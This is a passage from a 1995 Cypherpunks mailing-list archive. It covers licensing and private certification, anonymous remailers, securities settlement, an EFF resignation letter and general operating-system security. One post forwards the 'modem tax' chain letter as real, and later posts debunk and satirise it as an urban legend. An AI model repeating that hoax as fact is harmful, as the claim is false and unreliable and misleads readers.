publicizing the results.  Market forces could then react to a nice,
measurable reputation.  But what about new, untested, solo
practitioners?  What about the architect whose buildings are all going
to fall down, ten years from now?  Even with well-publicized
reputations, the consumer doesn't have the necessary information to keep
from getting hurt.  In those circumstances, it's useful to have
standards, and a trusted public agency that certifies a person meets the
standards.

- --
______________________________________________________________________
Don Doumakes             Finger doumakes@netcom.com for PGP public key

Foxpro databases built to your specifications.  Email me for details.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyWC1xtumcu2AjihAQGnRAP/UYqpg7gUpAyt7CMHgAUSApGHi9AFOJON
UPns4os25F2B7op0uCdOQibbTJTUO5cjcDnpZ1VoYD00dFVN64IhoL/vYasoI1LV
xm/grDW2bd4NKfOIYvbdYYwp8/BxtvCp9p8fGNksmHyWBPV017qieEo2rTHxuOWM
lLwwSQYPp4o=
=TW+P
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rishab@dxm.ernet.in
Date: Tue, 24 Jan 95 10:54:05 PST
To: cypherpunks@toad.com
Subject: Australian Constitution (and more) on FTP
Message-ID: <gate.8iwgZc1w165w@dxm.ernet.in>
MIME-Version: 1.0
Content-Type: text/plain


dave@esi.com.au 
> Obviously - it's handy having an on-line copy of the Australian
> Constitution.  Anyone want a copy?  I don't run an FTP site.

I posted something to this effect ages ago:

ftp://wiretap.spies.com/Gov/World/australia.con

The same directory contains constitutions and charters of many countries,
from China to Slovakia, as well as the covenant of the Hamas, and the Magna 
Carta. Other useful data on Wiretap include various UN documents, international
charters and treaties, and loads of (particularly US, but also other) 
legislation.

-----------------------------------------------------------------------------
Rishab Aiyer Ghosh                                "In between the breaths is
rishab@dxm.ernet.in                                  the space where we live"
rishab@arbornet.org                                        - Lawrence Durrell
Voice/Fax/Data +91 11 6853410  
Voicemail +91 11 3760335                 H 34C Saket, New Delhi 110017, INDIA  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 25 Jan 95 00:56:28 PST
To: Don Doumakes <doumakes@netcom.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <199501250503.VAA13311@netcom5.netcom.com>
Message-ID: <Pine.3.89.9501250003.A11561-0100000@netcom6>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Don Doumakes wrote:
 
> But I don't buy your other implication, that it is a Good Thing to
> unleash the unlicensed.  Licensing serves, or should serve, a public
> good under the following conditions:  (a) consumers don't have the
> information necessary to make an informed choice between professionals,
> and ....

This assumes that governments have the necessary wisdom
to tell a bad architect from a good architect.   This does
not seem very plausible.

What most people would do is look at the certificate issued by
various certifying organizations  -- for example the doctor's
university.

While universities often issue or refrain from issuing certificates
for corrupt and improper reasons, government supervision on this 
matter is unlikely to keep them honest --- indeed it is more likely
to force them to be dishonest, or to force them to deny their own
sound judgment in favor of arbitrary and foolish criteria imposed
by some ignorant and arrogant bureaucrat.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Charles Bell <quester@eskimo.com>
Date: Wed, 25 Jan 95 01:21:47 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <Pine.3.89.9501250003.A11561-0100000@netcom6>
Message-ID: <Pine.SUN.3.91.950125011443.8597B-100000@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 25 Jan 1995, James A. Donald wrote:

> On Tue, 24 Jan 1995, Don Doumakes wrote:
>  
> > But I don't buy your other implication, that it is a Good Thing to
> > unleash the unlicensed.  Licensing serves, or should serve, a public
> > good under the following conditions:  (a) consumers don't have the
> > information necessary to make an informed choice between professionals,
> > and ....
> 
> This assumes that governments have the necessary wisdom
> to tell a bad architect from a good architect.   This does
> not seem very plausible.
> 
> What most people would do is look at the certificate issued by
> various certifying organizations  -- for example the doctor's
> university.
> 
> While universities often issue or refrain from issuing certificates
> for corrupt and improper reasons, government supervision on this 
> matter is unlikely to keep them honest --- indeed it is more likely
> to force them to be dishonest, or to force them to deny their own
> sound judgment in favor of arbitrary and foolish criteria imposed
> by some ignorant and arrogant bureaucrat.
> 

So....once we get past what seems to be your utter refusal to consider 
the possibility that government could ever do anything right ....how do 
we ensure that those skyscrapers don't fall down on us?  That the surgeon 
who is going to open me up knows something about surgery?  That my money 
is at least somewhat safe in the bank?

If you are willing to trust your life to Adam Smith's 'invisible hand', 
then good luck to you.  I prefer to see the hand out on the table.

Charles Bell





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@jpunix.com>
Date: Wed, 25 Jan 95 05:22:44 PST
To: cypherpunks@toad.com
Subject: looking for secondaries
Message-ID: <199501251321.HAA02783@jpunix.com>
MIME-Version: 1.0
Content-Type: text/x-pgp


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	Jpunix.com has applied for (but not yet received) the domain
name alias.net. Alias.net will be used for domain hiding by remailers.
What I need are some volunteers to provide secondary nameservice for
both alias.net and jpunix.com. Anyone want to voulunteer?

 John A. Perry - KG5RG - perry@jpunix.com
 WWW - http://jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.
 PGP-encrypted e-mail welcome!
 
 Finger kserver@jpunix.com for PGP keyserver help.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyZP6lOTpEThrthvAQEnFwP/fp84eIZVVpoC3hHfoG3CO89GTovWRNli
M0c0sRMhvV8wrNbPOuyK11oY1XjcZfyjjWiSt7nt0q5yDB77FovFo5zxqNaS8mBr
+wSvBkB8/secyBrawFcgAejNF3orYHIguYiErOqMdC/V4hzNPIwTqhKuDNqtfyax
Mill1QwCnrg=
=RD9+
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 25 Jan 95 08:42:32 PST
To: cypherpunks@toad.com
Subject: Re: e$: Guilds, Friedman, and Web-servers for mutual funds
In-Reply-To: <v01510101ab4bb4545cd9@[199.0.65.105]>
Message-ID: <199501251641.IAA23018@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: rah@shipwright.com (Robert Hettinga)

   You can sell anything digitable on the net.

   Securities are mostly traded on a book-entry
   basis, that is, in IBM mainframe(still!) computer accounting systems. The
   back offices are all automated. 

In the interest of buzzword-compliance, book entry securities in the
USA are called ADR's -- American Depository Receipts.  ADR facilities
are privately operated; Bank of New York has (if I'm remembering
correctly) the single largest share of this market.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 25 Jan 95 06:24:53 PST
To: cypherpunks@toad.com
Subject: e$: Guilds, Friedman, and Web-servers for mutual funds
Message-ID: <v01510101ab4bb4545cd9@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:00 PM 1/24/95, Don Doumakes wrote:
>But I don't buy your other implication, that it is a Good Thing to
>unleash the unlicensed.

'Scuse me while I pound on scripture a bit.

I tend to concur with the esteemed Milton Friedman, who said, in summary,
that the primary benefits of any regulation, licensing regulation in
particular, accrue to the licensee. The people left standing after
regulation prices their competition out of the market tend to do very well
indeed.

There is a point here for cryptoanarchy, and I'll get to it in a minute.

Let's take the most hardened example of your point, and apply the logic of
Mr. Friedman, through the twisted filter of my logical processes, of
course. The poster child for this argument is of course, medicine. If, in
the late 19th century, the Food and Drug laws weren't passed, and the
guildification of the medical business didn't occur, what would medicine
look like today? I believe that the same scientific rigor would be applied
to the technology of medicine as has been done already. Too much money to
be made here finding real cures. Mobs would lynch/sue people who were
proven frauds by science and exposed as such in the press. So much for
licencing improving the "quality of practitioners".  I expect that medicine
would be less like Magick to us mere mundanes, and the apprentice/arcana
system that prevails may be in fact more subject to the laws of supply and
demand. In addition, if there weren't so many "rules" in the medical
business, the medical insurance business wouldn't be so non-competitive,
besides the inherent silliness of "insuring" a basic service like medicine.
Imagine food insurance, or car repair insurance, patently uneconomic
"extended warranties" notwithstanding.

OK. So what does this have to do with crypto. First, the whole
cryptoanarchic thing, which I include in this argument by fiat by pointing
to the Cyphernomicon: in this case, cryptodocs and their "Blade Runners"
(see Burroughs' book with the original title) will be able to practice
their trades with impunity, using regulatory arbitrage and outright
anonymity to defend themselves, relying on their success records with other
patients as their credentials. Second, instant settlement and electronic
commerce. With these tools you can buy any software (Video, Sound, Text,
Data) and their appropriate processing mechanisms from anywhere. You can
even buy "wetware" i.e. the time of an actual doc, and settle the trade
instantly.

Speaking of settling trades with guilds, I had something beat me over the
head while watching CSPAN's nth replay of October's "Networked Economy"
conference. (Tape number 48765, $35, CSPAN, 202-737-3220) As much of this
stuff as I try to read or see, I hadn't seen this before until about three
weeks ago. A comment made on a panel discussion by Scott Cook, the
president of Intuit (Quicken), and erst-while-Mrs. Bingamon's-not-looking
Vice President of Electronic Commerce at Microsoft, really got my
attention. He was on this panel with the president of Mosaic (now
Netscape), and the Prince of Darkness Himself (I think this was still
before the MS/Intuit merger announcement), among others.

To wit,

You can sell anything digitable on the net.

Now we know about doctors ;-), movies, songs, information feeds,
jokes-of-the-day, and software, but how about this: Financial Services.

Financial services? Sure, Mr. Cook says.  All we need is a little
"mainframe perestroika". Securities are mostly traded on a book-entry
basis, that is, in IBM mainframe(still!) computer accounting systems. The
back offices are all automated. So what about the people at the front of
the house? When you call up Fidelity and talk to a phone rep, what are you
doing? You're talking to someone on the phone who's punching what you want
into a computer for you.  You can do that yourself on any good
World-Wide-Web browser, all of which are forms-capable, and even secure,
now.

I've been doing consulting jobs with Fidelity off and on for quite a few
years now.  I thought I knew where the people who would say "yes" to the
idea of web-publishing net-able information were. The same bunch had just
posted an opening for someone to go swing deals with the online services
(AOL, Compu$erve). So, I figure, how much could it possibly cost to hang a
web-server on the net with mutual fund blurbage, prospectuses, etc., on it.
A whole bunch less than it would take to negotiate and develop a
Fidelity-zone in AOL, yes?

Obviously, the next step would be to put up fund quotes, and then, when
secure-HTML and digital signatures work for real, the ability for people to
move their own money around by themselves.  They can do that now with a PIN
number and Fidelity's voice response system, so why not on a Web server
with NSA-proof security?

Someday, there may even be digital cash, or a reincarnated bearer security
business.  Chaum and others talk about anonymous voting schemes which make
great substrates for anonymous internet securities markets where anyone can
trade their securities without a stockbroker... Sound familiar, anyone?
Perry and Eric and I beat this to death six months ago or so. I took the
better part of the beating, if I remember...

So anyway, I went on a hunt for the bunch which was going to build
Fidelity's web-server. I found a huge mess of domain-name registrations
belonging to Fidelity. I found out that they have a T1 hooked up to
NearNet, that they had shown several people I know the pages they had for
the Web server they're building, and it looks like they're bringing it online
real soon now, like a few weeks. Evidently, they've been there, done that,
or they're going to, anyway. Sigh.

Another new business idea bites the dust. Undaunted, maybe I should go to
Franklin/Templeton (Bahamas, anyone?), or Vanguard, or Pioneer, or Scudder,
and see if they're interested in keeping up with the Johnsons. :-).  Or
maybe not...

Cheers,
Bob Hettinga



-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Wed, 25 Jan 95 06:39:41 PST
To: sameer <sameer@c2.org>
Subject: Re: The Remailer Crisis
In-Reply-To: <199501200105.RAA05837@infinity.c2.org>
Message-ID: <X1c9lKJXYrxI078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> 	c2.org, of course, welcomes remailers.

Care to provide some details?

Thanks, Don

- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLyZglGvyi8p8VUiJAQGABQQAyvOwQSGaTd4d0FS6QmY9qfsGJnYd/+Mb
ZwVbQh31QVnpkYD9kN3DLpcqjzsp+G0UHGhaDShGBqGWlTeBAmt+J3JeDxYxTyOM
s2fgEkJlwrzNuATFHDvscAeMq8GlvU87J6BeBzo1sDRKyo9VIm3PWvPQO9oEwxh3
d7NjuuCs37w=
=xtiZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Date: Wed, 25 Jan 95 07:39:03 PST
To: cypherpunks@toad.com
Subject: data charge
Message-ID: <v01510102ab4c13015e0e@[152.97.12.101]>
MIME-Version: 1.0
Content-Type: text/plain


This came to the machttp_talk list and thought it was appropriate here:
******************************
>>Subject: Modem Use Fees
>
>Here is some info that was forwarded to me that all Arts Mgt
>List readers will find interesting. Please act accordingly. Thanks!
>
>Two years ago the FCC tried and (with your help and letters of
>protest) failed to institute regulations that would impose
>additional costs on modem users for data communications. Now,
>they are at it again. A new regulation that the FCC is quietly
>working on will directly affect you as the user of a computer and
>modem. The FCC proposes that users of modems should pay extra
>charges for use of the public telephone network which carry their
>data. In addition, computer network services such as CompuServ,
>Tymnet, & Telenet would also be charged as much as $6.00 per hour
>per user for use of the public telephone network. These charges
>would very likely be passed on to the subscribers. The money is
>to be collected and given to the telephone company in an effort
>to raise funds lost to deregulation.  Jim Eason of KGO newstalk
>radio (San Francisco, CA) commented on the proposal during his
>afternoon radio program during which, he said he learned of the
>new regulation in an article in the New York Times. Jim took the
>time to gather addresses which are given below.
>
>
>Here's what you should do (NOW!):
>
>1-Pass this information on. Capture the information which
>contains the text you are reading now. Find other BBS's that are
>not carrying this  information. Upload the ASCII text into public
>message on the  BBS, and  also upload the file itself so others
>can easily get a copy to pass along.
>
>2-Print out three copies of the letter which follows (or write
>yours down) and send a signed copy to each of the following:
>
>       Chairman of the FCC
>       1919 M Street N.W.
>       Washington, D.C. 20554
>
>       Chairman, Senate Communication Subcommittee
>       SH-227 Hart Building
>       Washington, D.C. 20510
>
>       Chairman, House Telecommunication Subcommittee
>       B-331 Rayburn Building
>
>Here's the suggested text of the letter to send:
>
>Dear Sir:
>
>Please allow me to express my displeasure with the FCC
>proposal which would authorize a surcharge for the use of modems
>on the telephone network. This regulation is nothing less than an
>attempt to restrict the free exchange of information among the
>growing number of computer users. Calls placed using modems
>require no special telephone equipment, and users of modems pay
>the phone company for use of the network in the form of a monthly
>bill.
>
>In short, a modem call is the same as a voice call and
>therefore should not be subject to any additional regulation.
>
>       Sincerely,
>
>
>                              ***************
>
>It is important that you act now. The bureaucrats already have
>it in their heads that modem users should subsidize the phone
>company and are now listening to public comment. Please stand up
>and make it clear that we will not stand for any government
>restriction on the free exchange of information.
>
>Please deal with this in a TIMELY manner. We can't wait and
>watch, or we will be walked over by government regulations that
>are trying to strangle us.
>
>
>Kirk deFord, Regional Telementor
>Region I
>The California Arts Project
>@ Casa Grande High School
>333 Casa Grande Road, Petaluma, CA 94953
>707.778-4677 (leave message) or at home: 707.769-8653  :%)
>kdeford@ctp.org
>
>
>
>*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
>*-  spiro(s) antonopoulos      + Please Note New Email Address -*
>*-  souljerky research         +      spiros@rtoads.com        -*
>*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
>

                                             aka:
(-: Jaeson M. Engle    ||    jme@josaiah.sewanee.edu :-)
(-:      www server: http://josaiah.sewanee.edu/         :-)
(-: It's February 8th! IT'S TIME!!! Ask me for details!:-)
(-: Finger 'jme@josaiah.sewanee.edu' for my Public :-)
                                        PGP block.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Wed, 25 Jan 95 07:07:42 PST
To: cypherpunks@toad.com (Cypher Punks)
Subject: Re: The Remailer Crisis
In-Reply-To: <X1c9lKJXYrxI078yn@ssnet.com>
Message-ID: <9501251504.AA22587@marlin.ssnet.com>
MIME-Version: 1.0
Content-Type: text


Apologies to the list...mailer put in a cc: I didn't notice.

> > 	c2.org, of course, welcomes remailers.
> 
> Care to provide some details?

-- 
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rparratt@london.micrognosis.com (Richard Parratt)
Date: Wed, 25 Jan 95 02:12:40 PST
To: jamesd@netcom.com
Subject: Re: Clinton freezes U.S. assets of Mideast groups
Message-ID: <9501251010.AA03760@pero>
MIME-Version: 1.0
Content-Type: text/plain


> The Eurodollar market got started because Russia feared 
> arbitrary confiscation of its dollar bank accounts.

Not actually true. It was because US banks were
subject to statutory limits on the amount of interest
they could pay on dollar deposits.

> At present it seems to me that unix machines on the internet
> are intrinsically insecure -- the methods used to secure them
> are a collection of ad hoc patches.  For example all
> unix machines are vulnerable to the trojan
> horse attack.

Banks are intrinsically insecure. All banks are subject to
the "sawn-off shotgun" attack, also the "kidnap the
manager's family" attack and several others.

> Windows NT is supposedly secure.  Certainly its design makes
> it possible to write software that is intrinsically secure,

Why do you think that? Certainly its compartmentalism
is better than UNIX, and as a "ground-up" design it's
probably seen better QA than UNIX. However, it hasn't had
20 years of interest from hackers and others. Also, while
the NT kernel may be *better*, several subsystems have
all the problems of UNIX, e.g. TCP/IP and the sequence
number attack.

I like NT, but it will never be a security panacea.

--
Richard Parratt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 08:02:21 PST
To: Jaeson.M.Engle@josaiah.sewanee.edu (Rhys Kyraden)
Subject: Re: data charge
In-Reply-To: <v01510102ab4c13015e0e@[152.97.12.101]>
Message-ID: <9501251601.AA15109@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Oh no! The modem tax urban legend comes around again!

.pm

Rhys Kyraden says:
> This came to the machttp_talk list and thought it was appropriate here:
> ******************************
> >>Subject: Modem Use Fees
> >
> >Here is some info that was forwarded to me that all Arts Mgt
> >List readers will find interesting. Please act accordingly. Thanks!
[...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Wed, 25 Jan 95 11:14:47 PST
To: Charles Bell <quester@eskimo.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <Pine.SUN.3.91.950125011443.8597B-100000@eskimo.com>
Message-ID: <Pine.3.89.9501251105.A18368-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 25 Jan 1995, James A. Donald wrote:
> > While universities often issue or refrain from issuing certificates
> > for corrupt and improper reasons, government supervision on this 
> > matter is unlikely to keep them honest --- indeed it is more likely
> > to force them to be dishonest, or to force them to deny their own
> > sound judgment in favor of arbitrary and foolish criteria imposed
> > by some ignorant and arrogant bureaucrat.

On Wed, 25 Jan 1995, Charles Bell wrote:
> So....once we get past what seems to be your utter refusal to consider 
> the possibility that government could ever do anything right ....how do 
> we ensure that those skyscrapers don't fall down on us?  That the surgeon 
> who is going to open me up knows something about surgery?  That my money 
> is at least somewhat safe in the bank?

Why, we have the credentials and audits of these organizations and
individuals checked by a being of godlike wisdom far superior
to that of us ordinary mortals -- namely that god on earth,
the government.

What makes you assume that guns make people wise and virtuous?

Common sense and casual observation do not support this hypothesis.

I recommend you read the excellent book on free banking
sold by Laissez Faire:  I do not remember their web
site, but I have a pointer to them in my home page. (see sig)

It details the sorry tale of government supervision of banks --
which invariably had the effect of the state governments robbing
the banks, or protecting well connected crooks who robbed the
banks.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 08:29:58 PST
To: Mark Grant <mark@unicorn.com>
Subject: Re: LOCKSMITH'S GUILD WANTS L
In-Reply-To: <Pine.3.89.9501251635.A18687-0100000@unicorn.com>
Message-ID: <9501251627.AA15154@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Grant says:
> 
> On Wed, 25 Jan 1995, Charles Bell wrote:
> 
> > how do
> > we ensure that those skyscrapers don't fall down on us?  That the surgeon
> > who is going to open me up knows something about surgery?  That my money
> > is at least somewhat safe in the bank?
> 
> With non-government reputation and certification agencies.

I'll point out that insurance companies have typically taken on this
role, being at risk in these instances. "Underwriters Laboratories"
work with electrical safety is a real world example in which this
actually happened.

However, could we please take this discussion to someplace like
talk.politics.libertarian? The mere fact that I agree with the point
doesn't mean that I have an interest in seeing the only place for
cypherpunk discussion taken over by discussion of the evils of
government.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@netcom.com (Timothy C. May)
Date: Wed, 25 Jan 95 11:49:04 PST
To: perry@imsi.com
Subject: Modem Tax!--Write to FCC Commmissioner Craig Shergold
In-Reply-To: <9501251601.AA15109@snark.imsi.com>
Message-ID: <199501251947.LAA04536@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
> 
> 
> Oh no! The modem tax urban legend comes around again!
> 


I am shocked at this proposed modem tax, along with the keyboard tax,
the printer tax, the mouse tax, and the cable tax.

FCC Commissioner Craig Shergold has asked that comment on this modem
tax be sent on post cards to him. He is hoping to receive more
postcards than any previous FCC Commissioner.

His address is:

FCC Commissioner Craig T. Shergold
Room 101
Ministry of Truth
42 Oceania Street, NW
Washington, D.C. 10666

In a related note, opponents of this modem tax are encouraged to flash
their headlights at oncoming traffic.

--Tim May

-- 
..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,  
tcmay@netcom.com       | anonymous networks, digital pseudonyms, zero
                       | knowledge, reputations, information markets, 
W.A.S.T.E.: Aptos, CA  | black markets, collapse of governments.
Higher Power: 2^859433 | Public Key: PGP and MailSafe available.
Cypherpunks list: majordomo@toad.com with body message of only: 
subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Wed, 25 Jan 95 09:03:34 PST
To: eric@remailer.net (Eric Hughes)
Subject: Re: e$: Guilds, Friedman, and Web-servers for mutual funds
In-Reply-To: <199501251641.IAA23018@largo.remailer.net>
Message-ID: <9501251703.AA15209@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Eric Hughes says:
>    From: rah@shipwright.com (Robert Hettinga)
> 
>    You can sell anything digitable on the net.
> 
>    Securities are mostly traded on a book-entry
>    basis, that is, in IBM mainframe(still!) computer accounting systems. The
>    back offices are all automated. 
> 
> In the interest of buzzword-compliance, book entry securities in the
> USA are called ADR's -- American Depository Receipts.  ADR facilities
> are privately operated; Bank of New York has (if I'm remembering
> correctly) the single largest share of this market.

Not quite right. ADRs are receipts used to permit the trading of
*foreign* securities in American markets. The ADRs will have
properties that shield American investors from all sorts of evils like
getting warrant issues that aren't registered in the US. There is a
new breed of these things called GDRs that I've heard tell of, though
I know little about them. Bank of New York may be big in this business
-- I don't know a lot about it.

Almost all normal securities in the US can be held in book-entry form,
although most can still be physically delivered for the benefit of
nuts. The securities are deposited with the Depository Trust
Corporation, or DTC, which handles these things. (DTC has some sort of
connection to SIAC that I'm not entirely clear on; it's been a long
time since I dealt with this stuff.) All securities have some sort of
certificate form, even the ones that never are able to be physically
delivered like some kinds of bonds -- this means that DTC gets to
maintain a big vault out in Long Island full of things like single
bond certificates covering an entire $500M issue and proudly stamped
all over "Non-Transferable". For some weird reason, the securities are
always held in the name of "Ceed & Co." when held this way; I don't
remember the details of why but it had something to do with compliance
with archaic laws, just as the existence of a physical certificate in
their vault does.

Japan does not do book entry at all -- there is an army of
ex-policemen on bicycles (I'm not making this up) who do delivery of
physical certificates in Tokyo.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@metronet.com (David K. Merriman)
Date: Wed, 25 Jan 95 10:14:45 PST
To: cypherpunks@toad.com
Subject: EFF Renewal response
Message-ID: <199501251814.AB01626@metronet.com>
MIME-Version: 1.0
Content-Type: text/plain


25 January, 1995

EFF
1557 K Street, Ste. 801
Washington, DC   20006

Sirs;
	This letter is in response to your recent membership renewal reminder.

	I have elected to withdraw my membership from EFF. My reasons for this are
really quite simple: I do not believe that certain past actions of the EFF
have been to the benefit of "the electronic frontier" - so much so that I
feel I must question whether the EFF truly represents my views.

	Specifically, I am referring to the debacle of the Digital Telephony act.
While the EFF was right in opposing this legislation, I believe that it was
grievously in error to make any kind of 'compromise' with federal officials
by assisting in the wording of the Act. While the EFF's stated position was
that it considered the legislation 'inevitable', and sought to make it as
palatable as possible, I do not believe that the EFF's willingness to
cooperate was appropriate at all. The EFF's actions have been likened to a
dog that barks quite loudly at a burglar, and then rolls over to have its
belly rubbed when offered a treat by that same burglar - a description I
find to be more appropriate than that put forward by EFF representatives
(which, incidentally, sounded quite similar to the old adage "if you're
going to be raped, you might as well lay back and enjoy it." - an attitude I
find offensive in either context).

	While the EFF's stated goal of protecting the electronic frontier and
cyberspace is quite laudable, I do not see how such protection is possible
by compromising with the political and philosophical equivalents of thieves,
brigands, rapists, and common thugs. By cooperating with federal officials,
you have granted them the sanction of legitimizing their position, rather
than holding it up as an example of the untoward intrusion and violation of
the personal rights and freedoms of the citizens of cyberspace that more
accurately described it - and you have done so for the political equivalent of
30 pieces of silver.

	You need not make any response to this letter, should you be so inclined -
EFF, with its actions regarding the Digital Telephony bill has completely
and thoroughly 'thrown away' any trust or faith in its position, policies,
or efficacy that I may have once had.

Sincerely,


David K. Merriman


cc: cypherpunks mailing list
- - - - - - - - - - - - - - - - - - - - - - - - - - 
Finger merriman@fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution 
inevitable."  John F. Kennedy 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@rahul.net
Date: Wed, 25 Jan 95 12:33:24 PST
To: sorr@eznet.net
Subject: Re: Identity
Message-ID: <199501252027.AA15453@bolero.rahul.net>
MIME-Version: 1.0
Content-Type: text/plain


sorr@eznet.net wrote:

> To whomever:
>   I'm a reporter at the daily newspapers in Rochester, N.Y., researching a 
> story on the recent spate of IP-spoof hack events. Supposedly a toad.com 
> address was used by a person who broke into the San Diego supercomputer center 
> a month ago. What's toad.com? I got your name from a web search that found an 
> old communique.
>   Can you be any help? I'm simply trying to reconstruct what happened.
> Steve Orr
> Gannett Rochester Newspapers

Fuck Gannett.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben <samman@CS.YALE.EDU>
Date: Wed, 25 Jan 95 09:42:11 PST
To: cypherpunks@toad.com
Subject: LAw in Cyberspace
Message-ID: <Pine.SUN.3.91.950125124043.5213A-100000@jaguar.zoo.cs.yale.edu>
MIME-Version: 1.0
Content-Type: text/plain


Well, Yale Law School is offering a class this semester on Law in 
Cyberspace.  I'm going to audit it, and when I get a syllabus (tomorrow), 
I'll post a copy if folks are interested.

Just thought it would be of general interest.

Ben

----
"By the end of 1648 all was over.  Cromwell was Dictator.  The Royalists 
were crushed; Parliament was a tool;  the Constitution was a figment; the 
Scots rebuffed, the Welsh back in their mountains; the Fleet was 
reorganised, London overawed.  King Charles, at Carisbrooke Castle, where 
the donkey treads the water wheel, was left to pay the bill.  It was mortal."
			--Winston Churchill
			--_History_of_English_Speaking_Peoples Vol. II





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 24 Jan 95 18:36:49 PST
To: cypherpunks@toad.com
Subject: Re: Here's what will happen to U.S. based remailers
In-Reply-To: <Pine.SV4.3.91.950124161239.1512A-100000@mirage.skypoint.com>
Message-ID: <Pine.SUN.3.91.950125124538.10006K-100000@eram.esi.com.au>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 24 Jan 1995, Samuel Kaplin wrote:

> Is this the poem, Lucky?

Not quite.  It's this one:

	First they came for the communists,
	and I did not speak out, for I was not one;
	They came for the Jews,
	and I was silent because I was not a Jew;
	They came for the Trade Unionists,
	and I did not protest, because I did not belong to a trade union;
	They came for the Catholics,
	and I said nothing because I was not a Catholic;
	And then they came for me.
	There was no one left to say anything...

	Rev Martin Niemoeller, 1945

-- 
Dave Horsfall (VK2KFU) | dave@esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE  9C 8C 54 5B 9A D4 A0 CD





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Horsfall <dave@esi.COM.AU>
Date: Tue, 24 Jan 95 18:35:04 PST
To: cypherpunks@toad.com
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <Pine.3.89.9501241122.A12422-0100000@netcom10>
